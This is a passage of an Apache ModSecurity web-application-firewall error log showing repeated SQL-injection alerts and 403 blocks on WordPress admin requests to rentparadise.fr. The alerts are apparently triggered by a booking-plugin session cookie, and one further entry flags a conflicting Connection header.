[Mon May 11 22:25:33.782887 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7PXo_DFxNSZVmaX3PlgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:34.247253 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7Pno_DFxNSZVmaX3PlwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:34.247525 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7Pno_DFxNSZVmaX3PlwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:34.804079 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Pno_DFxNSZVmaX3PlwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:35.147950 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7P3o_DFxNSZVmaX3PmQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:35.148249 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7P3o_DFxNSZVmaX3PmQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:35.514503 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7P3o_DFxNSZVmaX3PmQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:36.556196 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7QHo_DFxNSZVmaX3PnQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:36.556494 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7QHo_DFxNSZVmaX3PnQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:37.148453 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7QHo_DFxNSZVmaX3PnQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:37.938033 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7QXo_DFxNSZVmaX3PnwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:37.938326 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7QXo_DFxNSZVmaX3PnwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:38.526248 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7QXo_DFxNSZVmaX3PnwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:39.285430 2026] [security2:error] [pid 1588898:tid 1588907] [client 129.226.146.134:54426] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2021/09/MELIES-extrait-5.mp3"] [unique_id "agI7Q6FW67LJTsgN3jQL0wAAAAg"]
[Mon May 11 22:25:39.448247 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Q3o_DFxNSZVmaX3PoAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:39.448532 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Q3o_DFxNSZVmaX3PoAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:40.034461 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Q3o_DFxNSZVmaX3PoAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:40.839911 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7RHo_DFxNSZVmaX3PogAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:40.840203 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7RHo_DFxNSZVmaX3PogAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:41.417551 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7RHo_DFxNSZVmaX3PogAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:41.640417 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7RXo_DFxNSZVmaX3PowAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:41.640695 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7RXo_DFxNSZVmaX3PowAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:42.209512 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7RXo_DFxNSZVmaX3PowAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:42.655362 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Rno_DFxNSZVmaX3PpgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:42.655643 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Rno_DFxNSZVmaX3PpgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:43.015834 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Rno_DFxNSZVmaX3PpgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:43.735981 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7R3o_DFxNSZVmaX3PqAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:43.736272 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7R3o_DFxNSZVmaX3PqAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:44.364569 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7R3o_DFxNSZVmaX3PqAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:45.561467 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7SXo_DFxNSZVmaX3PqgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:45.561753 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7SXo_DFxNSZVmaX3PqgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:46.152256 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7SXo_DFxNSZVmaX3PqgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:46.757015 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Sno_DFxNSZVmaX3PrAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:46.757331 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Sno_DFxNSZVmaX3PrAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:47.373021 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Sno_DFxNSZVmaX3PrAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:47.840868 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id 